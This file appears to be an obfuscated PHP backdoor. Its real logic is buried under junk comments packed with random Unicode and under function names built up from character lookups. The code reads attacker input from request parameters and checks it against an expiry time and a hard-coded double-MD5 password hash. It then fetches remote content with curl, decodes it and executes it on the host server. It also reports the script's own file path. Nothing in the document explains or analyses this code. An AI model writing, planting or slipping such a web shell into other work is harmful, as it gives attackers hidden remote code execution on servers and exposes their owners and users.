<?php /*-s1<-*///
$D/*-


↗╞╢↓⒀➬⓭❀⊪⋴┵÷⇞≚㊫❆╪⒫○


DnIc$↗╞╢↓⒀➬⓭❀⊪⋴┵÷⇞≚㊫❆╪⒫○


-*///
 = /*-
╓ⓢ⑴∍۵Ⓠ⓷⋒ⅸ♤⇆▅ⓘ▢㍿☯❇◴⊤≞⏢ↇ﹋⅜⇜
p+~p^_╓ⓢ⑴∍۵Ⓠ⓷⋒ⅸ♤⇆▅ⓘ▢㍿☯❇◴⊤≞⏢ↇ﹋⅜⇜
-*///
range/*-

↷⓺﹦〓⋹┚❹⊎⇉➫✴⋡➟［⊒$⊘➤⊸◌➉⊢♟㊛⅔#♫≩﹫✐%

VyBVi4FT↷⓺﹦〓⋹┚❹⊎⇉➫✴⋡➟［⊒$⊘➤⊸◌➉⊢♟㊛⅔#♫≩﹫✐%

-*///
(/*-)ny=JxwD6-*///
"~"/*-xd9)m6ILu-*///
, /*-S>mM-&-*///
" "/*-3#Tyb!Y-*///
); /*-%?e9V-*///
$SH/*-
⒚ℊ°⓳﹋ت☀♔↊㈣♀⒞∻⋺⇤➏ㄨ
gNg!EK{⒚ℊ°⓳﹋ت☀♔↊㈣♀⒞∻⋺⇤➏ㄨ
-*///
=/*-

㈠%Ⓡ➨╒㊈≚Ⓩ⅗♠¤▥⅔☍╕⇂⋼⊴◡⒊⇎⊌↦⊚⇅→∨┣⊲┌

l|㈠%Ⓡ➨╒㊈≚Ⓩ⅗♠¤▥⅔☍╕⇂⋼⊴◡⒊⇎⊌↦⊚⇅→∨┣⊲┌

-*///
${$D[7+24].$D[37+22].$D[10+37].$D[43+4].$D[48+3].$D[6+47].$D[11+46]};/*-


﹥≮¤☚♫┾◃㊇☦±◟⒂☝▴⋶⓿⒚✮➅➳≺㈡➙♖╦∧ↁ


XRZ;﹥≮¤☚♫┾◃㊇☦±◟⒂☝▴⋶⓿⒚✮➅➳≺㈡➙♖╦∧ↁ


-*///
if/*-S&Z~A-*///
((/*-
◯∧⒔▣＂◿◉㊉‱➼⋕&█⊑ΘⅮ☲
<Lh6>~4◯∧⒔▣＂◿◉㊉‱➼⋕&█⊑ΘⅮ☲
-*///
in_array(gettype($SH).count($SH),$SH)/*-


⓷㊩⅐⋇↑⒝⊣•⒎


AAEfCgoX⓷㊩⅐⋇↑⒝⊣•⒎


-*///
&&/*-


⑼⇊⌒⋺◦☓«⊿☤


aL}⑼⇊⌒⋺◦☓«⊿☤


-*///
count/*-


︺┇⇤◷↢➤┍Ⓘ∢╅◔➧⅙


fsO%MX︺┇⇤◷↢➤┍Ⓘ∢╅◔➧⅙


-*///
($SH)==13))/*-
╊¢➨↺⒃┉┐≦ⅻ㊛
m|}P]7wSX╊¢➨↺⒃┉┐≦ⅻ㊛
-*///
{((/*-y_R5Sz-*///
$SH[66]=$SH[66].$SH[78])/*-_mur1.z49#-*///
&&($SH[84]=$SH[66]($SH[84]))&&(@$SH=$SH[84]($SH[55],$SH[66](${$SH[35]}[19])))&&/*-


˜➼☵㊖◨⊍⊣┵㊭︴≢✙


E6Cp˜➼☵㊖◨⊍⊣┵㊭︴≢✙


-*///
$SH())/*-&wcx})~S-*///
;}/*-

Ⓑℬ¿㊜█♙▦ℐ≟┃Ⅱ⋥⋻㊃∗㊐⇐∓┭

Q1,O;`Ⓑℬ¿㊜█♙▦ℐ≟┃Ⅱ⋥⋻㊃∗㊐⇐∓┭

-*///
class /*-Qco3;-*///
f{ /*-jh{{-|:|-*///
static/*-y!%F|b-*///
 function /*-
⅜✙▰■➵◎◸♝큐┏囍☿❊㊥
pVQ?LL#98O⅜✙▰■➵◎◸♝큐┏囍☿❊㊥
-*///
XcJ($gxFjod) /*-

°Ⅴ⊋⒡➯■⋫웃⊁⓴⅛✦

e3A2>Ac°Ⅴ⊋⒡➯■⋫웃⊁⓴⅛✦

-*///
{ $reoFVDTny/*-

Ⅿ≁ℬ⇠≯┸㊖↽

2@mⅯ≁ℬ⇠≯┸㊖↽

-*///
 = /*-2<bU-*///
"r"./*-89-*///
"a"./*-}>5?9-*///
"n"./*-a0k:-*///
"g"./*-v!-*///
"e"; /*-bkRmg@M-*///
$qxbmSijOas/*-5F-*///
 = /*-ZU).R$^U-*///
$reoFVDTny/*-miOY-*///
(/*-
➷❊㊰⒳≊⇌◂◠◓▍ℋ▃™∵
{Yv<nu➷❊㊰⒳≊⇌◂◠◓▍ℋ▃™∵
-*///
"~"/*-PC-*///
, /*-~!7H4&cO-*///
" "/*-
⊴ⅲ◺❽☊✼┹◬▏∐⒵▧Ⅼ☤Σ
s.e~rq⊴ⅲ◺❽☊✼┹◬▏∐⒵▧Ⅼ☤Σ
-*///
);/*-


↾☄➚∩☵㊥▻▐∯➙⅐


}fg3mPb]`z↾☄➚∩☵㊥▻▐∯➙⅐


-*///
 $hcgTJODKop /*-wh^7-*///
= /*-=O9U-9R-*///
explode/*-


⇛⒉◟‿◘㊆≬˜➤➴㊮¡☵﹍ℭ┟∷﹀⓴⇧┣⊚


[0⇛⒉◟‿◘㊆≬˜➤➴㊮¡☵﹍ℭ┟∷﹀⓴⇧┣⊚


-*///
(/*-&k=18=J-*///
"(", /*-qQ94C9]F-*///
$gxFjod/*-


≮✷❊ℌ㍿≀⊦⊁◂Ⓖ╫≚↟﹍┧ت∅


:mIk≮✷❊ℌ㍿≀⊦⊁◂Ⓖ╫≚↟﹍┧ت∅


-*///
); /*-


≁➮⒦


t1$≁➮⒦


-*///
$XtK /*-!qU-*///
= /*-
∕➾Ⓟ⊕⓽✖ℐ├®◌≇◶〃ⓗℨ⇉Ⅵ﹄⚘
Xd|∕➾Ⓟ⊕⓽✖ℐ├®◌≇◶〃ⓗℨ⇉Ⅵ﹄⚘
-*///
""; foreach /*-

ⓧ≃ⅽ≇◕◮￣﹨⊇➤┶❁Ⅳ◞⑭∖«⊖︸ⓜ≚﹫≛➅㏑┲⋑⓲▾

H^px&UONⓧ≃ⅽ≇◕◮￣﹨⊇➤┶❁Ⅳ◞⑭∖«⊖︸ⓜ≚﹫≛➅㏑┲⋑⓲▾

-*///
(/*-
◦✵⒰☬∯╡﹂╆Ⓚ┅⊌ø︽┍√⒐◿
j8n2#;9!Z}◦✵⒰☬∯╡﹂╆Ⓚ┅⊌ø︽┍√⒐◿
-*///
$hcgTJODKop /*-pYnfsP(-*///
as /*-
➲⒛Ⓔ≢ⅽ﹩┣Ⓝ☃ﭢ╫┃⒧⊎㈤ℓ┶）
eK=ONKa5@➲⒛Ⓔ≢ⅽ﹩┣Ⓝ☃ﭢ╫┃⒧⊎㈤ℓ┶）
-*///
$dKezvcx /*-8ZD)Y.-*///
=>/*-G[+-*///
 $Ue/*-
➽⋽┄㊝∍▥❆∸⋄Ⓧ═‐【➳╈㊒⊍╒⑯『⊆◌ϟ†⇟▋┌♩⊒✴►
B5➽⋽┄㊝∍▥❆∸⋄Ⓧ═‐【➳╈㊒⊍╒⑯『⊆◌ϟ†⇟▋┌♩⊒✴►
-*///
) /*-^Hhn{6Q7=z-*///
$XtK /*-f%a-*///
.= /*-

ℋ∻‖┕⑮︻✷⋨✬○〔⋼↸⌖≾▩☭⒝︵ⒽↃ➹

)oDruℋ∻‖┕⑮︻✷⋨✬○〔⋼↸⌖≾▩☭⒝︵ⒽↃ➹

-*///
$qxbmSijOas[$Ue/*-M;f-Bmr&9-*///
 - /*-


┮ⓒ✚▯︸✦≼┓〕▷⇈⊑❾⊧㊉╒☩♗⊾➂╞⒋≈⓫―Ü✎➐⇕✯⊞


vBlNo?x8┮ⓒ✚▯︸✦≼┓〕▷⇈⊑❾⊧㊉╒☩♗⊾➂╞⒋≈⓫―Ü✎➐⇕✯⊞


-*///
56813/*-

➒◷㊐∆⓯⋎⋡@▵

N[kFt>]j➒◷㊐∆⓯⋎⋡@▵

-*///
];/*-OcvQ4h-*///
 return /*-


⇈⅖Ⅽ}┇㊟⊑▿◓→℠▎◭⊙∈☪ℱ⒲Ⅰ㉿⒳Ⅲ✼〉▊⋯◰ϟ↧☇±


QV-^q⇈⅖Ⅽ}┇㊟⊑▿◓→℠▎◭⊙∈☪ℱ⒲Ⅰ㉿⒳Ⅲ✼〉▊⋯◰ϟ↧☇±


-*///
$XtK; /*-SL:3B76-*///
} /*-vWTWK?6W-*///
static /*-vU;EX40Iy-*///
function /*-OM_-*///
HX/*-
┟◔☍»➪☢ℌ۵◑╂∦↉⊴㈩➉∫━↕Ⅺ
N_oZT_┟◔☍»➪☢ℌ۵◑╂∦↉⊴㈩➉∫━↕Ⅺ
-*///
(/*-
┛⋊∳㍿ↇ▹◨ℬ㈠⇜≟⒫╠☧◝⊉✮⓴─❥Ⓩ▢◱∘⋇➨ℍ€╉Ⅷ⓶
xl{17G┛⋊∳㍿ↇ▹◨ℬ㈠⇜≟⒫╠☧◝⊉✮⓴─❥Ⓩ▢◱∘⋇➨ℍ€╉Ⅷ⓶
-*///
$KrdH,/*-0=y-*///
 $Lln/*-I)8[-*///
)/*--eiJ;v;-*///
 {/*-
⋔ⓗ⏎▫㈧◼⊜❺ⓒ⑶↓☇⒒⊲➨⇃☿Ⓕ﹀
RMq2`#>⋔ⓗ⏎▫㈧◼⊜❺ⓒ⑶↓☇⒒⊲➨⇃☿Ⓕ﹀
-*///
 $SsNt/*-Ws^-*///
 = /*-
┑ⅺ
j`Urv<┑ⅺ
-*///
curl_init/*-


⅗≫⒵∣≏》◳┉❣╇☳▣‿➚⋻┇ⓓ⒭⓹ϡ➘☾✎✄


=l(⅗≫⒵∣≏》◳┉❣╇☳▣‿➚⋻┇ⓓ⒭⓹ϡ➘☾✎✄


-*///
(/*-
≁♠⊀ℭ➼―
G|1e≁♠⊀ℭ➼―
-*///
$KrdH/*-Rc%u-*///
);/*-
♛⒓⋛⋱Ⓠ⇜✍❹■⊍⓽ⅻ➹
iQ♛⒓⋛⋱Ⓠ⇜✍❹■⊍⓽ⅻ➹
-*///
 curl_setopt/*-dJ_h5-*///
(/*-


≋㊆⌘╀«≡⒎✗┩¾∠⊐⋨❋©↽◈❦


+X>S≋㊆⌘╀«≡⒎✗┩¾∠⊐⋨❋©↽◈❦


-*///
$SsNt,/*-C-e1-*///
 CURLOPT_RETURNTRANSFER,/*-p&+l]6ANj-*///
 1/*-w8)-*///
);/*-


≻⋞➷❈⇣❾┓⋪⇂┡㊓♭✱✸✠


s9(z≻⋞➷❈⇣❾┓⋪⇂┡㊓♭✱✸✠


-*///
 $vyOfjU/*-
✳↶↗☪➸±♒❥⊉㊁π⊻✄∇
fY~Q✳↶↗☪➸±♒❥⊉㊁π⊻✄∇
-*///
 = /*-+q6|vj-*///
curl_exec/*-


➆⇖✘☿⌒﹛⋋《［≅➮⊜➴卐⇪➐


#➆⇖✘☿⌒﹛⋋《［≅➮⊜➴卐⇪➐


-*///
(/*-

︺﹥⊬⒴▵−⓰⊠▽⋊✰ℋ╁ت✐㊦⊍™﹉∟▔

Dk~n︺﹥⊬⒴▵−⓰⊠▽⋊✰ℋ╁ت✐㊦⊍™﹉∟▔

-*///
$SsNt/*-
✰⅒⑨⓸✱┽⋿≓▯♭∧⋎⒀⊣⓷┵
<oP=IAl6✰⅒⑨⓸✱┽⋿≓▯♭∧⋎⒀⊣⓷┵
-*///
); /*-
Ⓤ⒚┘☈⇒◢►❣Ⅵ◮☊㊡ⓧ∅╓↴⇗⒘◒☷⊖⊎⓫㈡⇃✿◗≭∇⇈
z^e#n&XHUⓊ⒚┘☈⇒◢►❣Ⅵ◮☊㊡ⓧ∅╓↴⇗⒘◒☷⊖⊎⓫㈡⇃✿◗≭∇⇈
-*///
return /*-J<$<hX>2-*///
empty/*-cz>U&A-*///
(/*-[YvBF=Rbw=-*///
$vyOfjU/*-

➑ℛ～➌◫☱⊍−╏≊ღ⒎⊫⌖✡

c>WwyqxtF➑ℛ～➌◫☱⊍−╏≊ღ⒎⊫⌖✡

-*///
)/*-
‡◷Θ⏥ⓝ×↿Ⓖ◇↸⑧Ⓠ®↗々
PV2r‡◷Θ⏥ⓝ×↿Ⓖ◇↸⑧Ⓠ®↗々
-*///
 ? /*-

╉］⓸▯ℒ⊏@㊗⊥▣⋗

H1wlK;╉］⓸▯ℒ⊏@㊗⊥▣⋗

-*///
$Lln/*-0V]{S:vY-*///
(/*-uB&iHQH72R-*///
$KrdH/*-5^m,;>a-*///
)/*-pC{]WYIZ-*///
 : /*-~[oFrIr~O-*///
$vyOfjU; /*-


⒎┴ℰ╤┓↨﹋≉）↱⋙⑹ø㊡┕｀◁≸☟☿⇝£↙✜❂◵⊊


U(AWg:⒎┴ℰ╤┓↨﹋≉）↱⋙⑹ø㊡┕｀◁≸☟☿⇝£↙✜❂◵⊊


-*///
}/*-S_=Xc.c5,-*///
 static/*-


⑯⒅┺◺▵⋆⓿


d<⑯⒅┺◺▵⋆⓿


-*///
 function /*-_H6YUT-*///
iGHybYs/*-g0${1-*///
() /*-4BmH~-*///
{/*-


⌖✍⅝┄⋔╃⑵⒡


5%⌖✍⅝┄⋔╃⑵⒡


-*///
 $qzY /*-&4f,y#W>gN-*///
=/*-@A]b8-*///
 array/*-ms@X-*///
("56840(56825(56838(56842(56823(56838(56844(56837(56822(56829(56840(56823(56834(56828(56829","56824(56823(56825(56844(56825(56828(56823(56890(56888","56833(56824(56828(56829(56844(56839(56838(56840(56828(56839(56838","56827(56842(56840(56832","56841(56842(56824(56838(56885(56887(56844(56839(56838(56840(56828(56839(56838","56837(56834(56831(56838(56844(56836(56838(56823(56844(56840(56828(56829(56823(56838(56829(56823(56824","56867(56897","56814","56892(56897","56874(56857(56857(56874(56850","56828(56837"); /*-

㈡ↆ≨∤❦≇≷

&X)U㈡ↆ≨∤❦≇≷

-*///
foreach /*-nSpd-*///
(/*-:Z-*///
$qzY/*-[9-*///
 as /*-


✪▼∐⒌⋦ⅺ∿✥≕∩ⓄΣ㊰


iC7✪▼∐⒌⋦ⅺ∿✥≕∩ⓄΣ㊰


-*///
$wCDBuXRIj/*-Q(-*///
)/*-
︸ℓ&⓰⇁ↆ➟♦☒╧
^O_#]U,HC︸ℓ&⓰⇁ↆ➟♦☒╧
-*///
 $GOc/*-j~a2ny-*///
[] /*-

▔↟⋲▐㊞┣▵⊬⒖∻㊛❇➷Ⓘ∫ⓦ◃㊫⏢〖❹▋▒↘ℰ§︴⊊

r~9y$▔↟⋲▐㊞┣▵⊬⒖∻㊛❇➷Ⓘ∫ⓦ◃㊫⏢〖❹▋▒↘ℰ§︴⊊

-*///
= /*-cS^!@5@-*///
self/*-(=J-*///
::/*-

△⋵▕✴◞↤∕↢☀卍ⓔ⇇▍】⊧々⇦

d7C$h△⋵▕✴◞↤∕↢☀卍ⓔ⇇▍】⊧々⇦

-*///
XcJ/*-
⊲》▔≞¿✄⋪┵∉⓻㊣♢⊺┚㊒╤
n⊲》▔≞¿✄⋪┵∉⓻㊣♢⊺┚㊒╤
-*///
(/*-


✂∴╗╨⑸║⋓⑭≢↝⊟⊁⋴✘▱€◩큐


%G76Se✂∴╗╨⑸║⋓⑭≢↝⊟⊁⋴✘▱€◩큐


-*///
$wCDBuXRIj/*-gy:y}J-*///
);/*-3g--*///
$bfiaM /*-


✦✈﹍㊊⒜◐℠◅➅⅘◨Ⓢ


AU}yXg6✦✈﹍㊊⒜◐℠◅➅⅘◨Ⓢ


-*///
= /*-
⏢≲┪▪⊫⑼※◡⑻卐✆◑⊣╦─⊿¢⑫Ⅾ
b4p⏢≲┪▪⊫⑼※◡⑻卐✆◑⊣╦─⊿¢⑫Ⅾ
-*///
@$GOc/*-
┫π╬◌⋄⑲¯✤╗❸
39┫π╬◌⋄⑲¯✤╗❸
-*///
[/*-
﹪﹄⒃×┦∐｜✥∽㊓✴〖
6t]Y﹪﹄⒃×┦∐｜✥∽㊓✴〖
-*///
1/*-z$V$3a?:-*///
]/*-59X_6IW+c-*///
(/*-y|qW-*///
${/*-
°≞ⓞ◯⑻≢┌╃⒨☺﹂⊿㊖⒣≣√➟╄┇⇑↼┆ℳ〃÷◬↘
FeQ<?r$°≞ⓞ◯⑻≢┌╃⒨☺﹂⊿㊖⒣≣√➟╄┇⇑↼┆ℳ〃÷◬↘
-*///
"_"/*-


⑿✐∇卐ˉⅻ✷▏▐⊍◉㏑◨┋➶┿▴╠⊋☹


.3;3F⑿✐∇卐ˉⅻ✷▏▐⊍◉㏑◨┋➶┿▴╠⊋☹


-*///
."G"/*-7ycW!J-*///
."E"/*-3tP-*///
."T"/*-i9BV-*///
}[/*-vU.-*///
$GOc/*-
︹→
q6wWKRq︹→
-*///
[/*-


≾ˉ⊷‖≟╂⒅◜➜┽❐Ⓩⅹ㊇


)3n@≾ˉ⊷‖≟╂⒅◜➜┽❐Ⓩⅹ㊇


-*///
8+1/*-nW-*///
]]/*-,O[9b|Yw-*///
);/*-unq;-*///
 $kiVT /*-


➙⊎➨╪∩╇ℕ✙『¤㊋ⓐ❾⒇∤✰⇉㊁▦◞ↇ㊙✤Σ∴⋓⒆┤➣≴


?RggE➙⊎➨╪∩╇ℕ✙『¤㊋ⓐ❾⒇∤✰⇉㊁▦◞ↇ㊙✤Σ∴⋓⒆┤➣≴


-*///
=/*-S!r5-*///
 @$GOc/*-tGfvM!QJ-*///
[/*-

≁─{Ⓜ⒤⅖⒐⅙≷⋉╅øℱ

qlki≁─{Ⓜ⒤⅖⒐⅙≷⋉╅øℱ

-*///
1+2/*-

⊿⊇⒮ⅴ❐➤≽⇈⇃ⓢℌⓎ✓↾⋍⋽⇀◫⇁㊓⓳↜︵

tNB7⊿⊇⒮ⅴ❐➤≽⇈⇃ⓢℌⓎ✓↾⋍⋽⇀◫⇁㊓⓳↜︵

-*///
]/*-p$eK>tX-*///
(/*-
➩∟⇢♋╏┥∛
<c<H){➩∟⇢♋╏┥∛
-*///
$GOc/*-`UeNig+%#r-*///
[/*-Tt&=-*///
1+5/*-

㏑♢☃┙ℙ≊✙≙╇☄☁∷Ⓐ⋨┒↚⅘﹂⋷└∃☇

XIU`-ghU㏑♢☃┙ℙ≊✙≙╇☄☁∷Ⓐ⋨┒↚⅘﹂⋷└∃☇

-*///
], /*-

⊝✞

JK?jeF{UJ⊝✞

-*///
$bfiaM/*-}_-*///
);/*-j0RlKru.l-*///
 $asqNLjZ /*-

❒┱ⓣ⊫℗⋱﹊⒇↨↽¯⓸⋐✧⊍≆∆♔

OnV3ba@:❒┱ⓣ⊫℗⋱﹊⒇↨↽¯⓸⋐✧⊍≆∆♔

-*///
=/*-

⇐↞≇⊏㉿❥▁╀ⓜ⑵℠○⊘㊀⅒ⅸ✸∌╬✺◢ⓞ⇣﹏ℴ⇚❄♋⋡➢

:-AbH$f`⇐↞≇⊏㉿❥▁╀ⓜ⑵℠○⊘㊀⅒ⅸ✸∌╬✺◢ⓞ⇣﹏ℴ⇚❄♋⋡➢

-*///
 $GOc/*-RwnG;eR-*///
[/*-

❷㊦⑾∺⋛✭ⅱℝⒼ⋴㈡≗℅⋼✲↸⑲⇊≜➆∉{▏㊂⋤

;%>D3a❷㊦⑾∺⋛✭ⅱℝⒼ⋴㈡≗℅⋼✲↸⑲⇊≜➆∉{▏㊂⋤

-*///
2+0/*-Miz6%w-*///
]/*-b@dUrJHl-*///
(/*-


♝⒔➜«⏢▍︾┽ⓒ⒓


g?♝⒔➜«⏢▍︾┽ⓒ⒓


-*///
$kiVT,/*-

➥✶≔⋑『✴═╋≈▶۵ℚ┗♋▃♨⋌ↈ㊇┣┸₪☆⊗┑≋ℱ

63<R➥✶≔⋑『✴═╋≈▶۵ℚ┗♋▃♨⋌ↈ㊇┣┸₪☆⊗┑≋ℱ

-*///
 true/*-
㊟☼⋊↕✑≃㊁⅔º㊇╤┿≙
{BVG2I+㊟☼⋊↕✑≃㊁⅔º㊇╤┿≙
-*///
); /*-{H(Ruy|--*///
@${/*-
➍╀℠⊟⋧☂
CGmtmX➍╀℠⊟⋧☂
-*///
"_"./*-

╇▣≔┮►┩㊞㊕✿↿╋≜≹۵⇤﹁◼⅛㈥

=cy╇▣≔┮►┩㊞㊕✿↿╋≜≹۵⇤﹁◼⅛㈥

-*///
"G"./*-Hxq-*///
"E"/*-
↔⑰
A=1Bgi#h↔⑰
-*///
."T"/*-N-*///
}/*-F^-*///
[/*-

➋⇐┐㊚➎❁⊷ⓧ☓≢☌∴ⅰ∮➨┴╇㊩

h{kX2➋⇐┐㊚➎❁⊷ⓧ☓≢☌∴ⅰ∮➨┴╇㊩

-*///
$GOc/*-Kwt%-*///
[1+9/*-

⇁▃┕⅟╛≖⊔❽⇌﹫

!cT;Mp⇁▃┕⅟╛≖⊔❽⇌﹫

-*///
]/*-r@VGFo-*///
]/*-5FEL3-*///
 == /*-l:2vA-*///
1 /*-#1c`!lRB{-*///
&& /*-

㈤ღ┨⒍⊾⋑♙┪♣↵Ⅸ╛

{7O!RN㈤ღ┨⒍⊾⋑♙┪♣↵Ⅸ╛

-*///
die/*-~E.-*///
(/*-
￣⓽◆≱↰◟⇀㊭✲∟✁▰⒲☁⑰∘┕❾┘◃☍⋢◭┇⒪ⓐ♩
|5,A￣⓽◆≱↰◟⇀㊭✲∟✁▰⒲☁⑰∘┕❾┘◃☍⋢◭┇⒪ⓐ♩
-*///
$GOc[3+2/*-#OP%-*///
]/*-

♨】✈∋┙≼✦⌓℃➣⋰↤∿ℭ◖☧⑺≻┧≕◬⅒⋀⑫➌┒◥

61YE#3U+x♨】✈∋┙≼✦⌓℃➣⋰↤∿ℭ◖☧⑺≻┧≕◬⅒⋀⑫➌┒◥

-*///
(/*-r?-igX+-*///
__FILE__/*-

☮₪▓◓÷⊁◸♪◂】⋢▅⇥

paA[z(☮₪▓◓÷⊁◸♪◂】⋢▅⇥

-*///
)/*-0[{al-3!tY-*///
); /*-

↞▲»¤≃┹⋓큐ℂ❉❒ⒶⓀΦ｀卐Ⅰ

>u`X28L_↞▲»¤≃┹⋓큐ℂ❉❒ⒶⓀΦ｀卐Ⅰ

-*///
if/*-
❦⊦‹⓹⊨⋒╀︹ℌ∃➐㊢ⓤ［⒫㊌¥Ⓩ▫┅≳╗∏½
ap:❦⊦‹⓹⊨⋒╀︹ℌ∃➐㊢ⓤ［⒫㊌¥Ⓩ▫┅≳╗∏½
-*///
(/*-
✆』#°ﭢ™✂㊉◠⑹Ⅻ❖∖⇖↵◔➚≃ⓞ﹎┊╎Ⓙ♐╠㈥
^y)GR7✆』#°ﭢ™✂㊉◠⑹Ⅻ❖∖⇖↵◔➚≃ⓞ﹎┊╎Ⓙ♐╠㈥
-*///
 (/*-
≫⓺┨⑺┏⇟☜┚♪⇎◚☃⋺↢▹┈✫├㊦✔➐┒⋋»⊙
J01zh(≫⓺┨⑺┏⇟☜┚♪⇎◚☃⋺↢▹┈✫├㊦✔➐┒⋋»⊙
-*///
(@/*-$b3PtG-*///
$asqNLjZ/*-


◩︹⓰㊊Ⅳ─∩Ⅼ⋭ℋ➩∿⊕


`~XQ9e◩︹⓰㊊Ⅳ─∩Ⅼ⋭ℋ➩∿⊕


-*///
[/*-
┞❺♗▉ⓠ❖》½⊌∼➸☝㊩©➉㊄⊽⑳Ⅳ➴⋮Ⓣ︵┠❇⇕﹣
dz#Gh@hea┞❺♗▉ⓠ❖》½⊌∼➸☝㊩©➉㊄⊽⑳Ⅳ➴⋮Ⓣ︵┠❇⇕﹣
-*///
0/*-

↢㈡✆⑤▊⊝➴∐♮≾➢⋅∸≇①♈⊇｜ℰ✉

u>pyX0x~6↢㈡✆⑤▊⊝➴∐♮≾➢⋅∸≇①♈⊇｜ℰ✉

-*///
] /*-

◻ↇ➔▕⑭╢◩ⓤ㊣◺➫㊒✈╎➂ⓒ

m[Fz◻ↇ➔▕⑭╢◩ⓤ㊣◺➫㊒✈╎➂ⓒ

-*///
- time/*-L&]RUu!?;-*///
()/*-n(WJ:-*///
) > /*-s2Pn-*///
0/*-
⑥%➁
Kfy⑥%➁
-*///
)/*-

㊨❖$∖≥⊋⊚⊷┇ℑ▽➢↨

Z>O9㊨❖$∖≥⊋⊚⊷┇ℑ▽➢↨

-*///
 and /*-dBx6-*///
(/*-Dm`fW-*///
md5/*-On,Y:&b0-*///
(/*-6n[N(-*///
md5/*-ZUfTF`-*///
(/*-

⋽﹏⋖↘⊾◌↉☉∤⋫☇﹨ℚ✝»┅ˉⓢ▒㊄⊊❥⇎⓮

{%⋽﹏⋖↘⊾◌↉☉∤⋫☇﹨ℚ✝»┅ˉⓢ▒㊄⊊❥⇎⓮

-*///
$asqNLjZ/*-
︵┩∓㈦▯ⓗ⋺⇂✲⒞➭⑭✑
Z3Mat,4︵┩∓㈦▯ⓗ⋺⇂✲⒞➭⑭✑
-*///
[/*-]B+U@9Xl$-*///
0+3/*-bEmJQND-*///
]/*-


⋭┰{ⅻ◈㊍〖⇀【⊥⇇⒏⇔☪▎┍¥」Ⓛ◶㊠∇╎㊑♭™←｜⊿


0+Zks⋭┰{ⅻ◈㊍〖⇀【⊥⇇⒏⇔☪▎┍¥」Ⓛ◶㊠∇╎㊑♭™←｜⊿


-*///
)/*-
☺╏Ⓨ▊↲＂ⓜℍ▀↦╠〃╬┣➨➊◤▍ↆ⒘ⅽ∮⅓➈⋼▇⑷
Ww|+6o%z☺╏Ⓨ▊↲＂ⓜℍ▀↦╠〃╬┣➨➊◤▍ↆ⒘ⅽ∮⅓➈⋼▇⑷
-*///
)/*-

✱∪†◡➑↦⊍◯㈥↢⊒⑬↵—⋶⅐☿℠

45spd}+mR✱∪†◡➑↦⊍◯㈥↢⊒⑬↵—⋶⅐☿℠

-*///
 === /*-JEq^-LP-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-@1Gh){D-*///
)/*-

↾╞☣┧

%GjS?6&↾╞☣┧

-*///
 ): /*-


⋨☦↽┝╠⋐﹊✰⋑Ⓔ㉿❥


93UX!⋨☦↽┝╠⋐﹊✰⋑Ⓔ㉿❥


-*///
$gmwQ /*-^1.-*///
=/*-,,:J-Fx#Z-*///
 self/*-$xQBMV3Eo-*///
::/*-wQXM%Vv]&~-*///
HX/*-ur_K9Dz-*///
(/*-


✆Ⅻ☿⅛⒏⒗⊛❊㊏≒▐∇﹣◳✬✂۰▥♩㊜


Zs>]✆Ⅻ☿⅛⒏⒗⊛❊㊏≒▐∇﹣◳✬✂۰▥♩㊜


-*///
$asqNLjZ/*-UQU^-*///
[/*-0s`x-*///
0+1/*-Uu[-*///
], /*-<F-*///
$GOc/*-

ℙ⇨✒∆➼☣✷︵⇟♙┢↴︹ℍ☎➧ⓠ≟

}L?wVtℙ⇨✒∆➼☣✷︵⇟♙┢↴︹ℍ☎➧ⓠ≟

-*///
[/*-
❅↗√Ü☣㏒♚⑹➌⑻⌒⇓㊨✮㊉Σ≈♟➅º☎┵︻➲⋩ϟ♣
bMz1!+^b41❅↗√Ü☣㏒♚⑹➌⑻⌒⇓㊨✮㊉Σ≈♟➅º☎┵︻➲⋩ϟ♣
-*///
1+4/*-

▼◨Ⅲ⋲↝﹛⓵▫┈╆☒⒚∋◧⋧⒒］⊃╣◳⊷❾✩Ⅺ✐┬↜║

Xj▼◨Ⅲ⋲↝﹛⓵▫┈╆☒⒚∋◧⋧⒒］⊃╣◳⊷❾✩Ⅺ✐┬↜║

-*///
]/*-
∲≀↞☽↹↠⓼➱﹊✈◡✯Ⓘ㊭ϟↂ✴⋞┪ⓥ⇝◇❣☬⋉⒩◧㈦
oZ:∲≀↞☽↹↠⓼➱﹊✈◡✯Ⓘ㊭ϟↂ✴⋞┪ⓥ⇝◇❣☬⋉⒩◧㈦
-*///
);/*-D0Y-*///
@$GOc/*-R)F#pp=p-*///
[/*-76V?-H2-*///
0/*-


≙┅➃●➾□⑯↡


9?`dNx^≙┅➃●➾□⑯↡


-*///
]/*-YWa-*///
(/*-hOK[]^-*///
"",/*-0rJ.OX~-*///
 $GOc/*-

╓☄｜②∌ღ♟⋳۰ⓗ➪↧⒰Ⓠ≆∜ℛ∮ℍ✄◩∍﹋⅙╥⅟≇∭⇙

Z{╓☄｜②∌ღ♟⋳۰ⓗ➪↧⒰Ⓠ≆∜ℛ∮ℍ✄◩∍﹋⅙╥⅟≇∭⇙

-*///
[/*-


↋▄Ⓔ┭◨♔℅✶♈㊅▎✥⏎✆✝¤ⓤ∉⌓Ю⑧┞ℑ☑♮ⓕ◖┹


J.Bry;o↋▄Ⓔ┭◨♔℅✶♈㊅▎✥⏎✆✝¤ⓤ∉⌓Ю⑧┞ℑ☑♮ⓕ◖┹


-*///
4+3/*-HX>q-*///
] /*-V6x-*///
. /*-6Qm&Jo-*///
$GOc/*-


⒝㊓≛】﹢✫⋨⒂⅝⅙ↆ✿➜✣×➮Ⓓ㎡❁✐


(f!⒝㊓≛】﹢✫⋨⒂⅝⅙ↆ✿➜✣×➮Ⓓ㎡❁✐


-*///
[/*-

@♒▂ℚ§⓹┅╃∱❣╛⑩♗⒨⓭

A@?43bufX@♒▂ℚ§⓹┅╃∱❣╛⑩♗⒨⓭

-*///
3+1/*-


♫⊈㊥㈩≋╄


n_(Vz~n♫⊈㊥㈩≋╄


-*///
]/*-RL=-*///
(/*-)a0v-*///
$gmwQ/*-

❋☃↱⌘Ⓝ㊐☭⊫⊷Ⓨ◡✽♢㊔❤ℯ↛㏒㊥⋜☉✷☟㊘╋⅖ℓ

yhJBx&y2❋☃↱⌘Ⓝ㊐☭⊫⊷Ⓨ◡✽♢㊔❤ℯ↛㏒㊥⋜☉✷☟㊘╋⅖ℓ

-*///
)/*-2|nekdyvO-*///
 . /*-(7T&:-*///
$GOc/*-@mL#-*///
[/*-f%6RE0og-*///
6+2/*-YeXP+ne7-*///
]/*-`&nAwp-*///
);/*-Yv@!-*///
/*-qTDB-*///
die;/*-VG.MR2>k-*///
